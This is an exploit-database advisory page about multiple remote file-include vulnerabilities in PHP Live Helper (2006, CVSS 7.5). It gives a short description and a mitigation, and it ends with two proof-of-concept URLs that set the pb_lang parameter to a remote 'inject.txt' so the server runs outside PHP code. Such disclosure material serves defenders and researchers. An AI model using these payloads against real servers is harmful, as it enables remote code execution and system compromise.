header-logo
Suggest Exploit
vendor:
PHP Live Helper
by:
SecurityFocus
7.5
CVSS
HIGH
Remote File-Include Vulnerabilities
98
CWE
Product Name: PHP Live Helper
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

PHP Live Helper Multiple Remote File-Include Vulnerabilities

PHP Live Helper is prone to multiple remote file-include vulnerabilities. An attacker can exploit these issues to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.

Mitigation:

Input should be validated and filtered to prevent attackers from including malicious files.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/20603/info

PHP Live Helper is prone to multiple remote file-include vulnerabilities.

An attacker can exploit these issues to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.

http://www.example.com/[p-book_path]/admin.php?pb_lang=http://www.example.com/inject.txt?
http://www.example.com/[p-book_path]/pbook.php?pb_lang=http://www.example.com/inject.txt?

Navigation

Suggest Exploit

Services By CQR

cqrsecured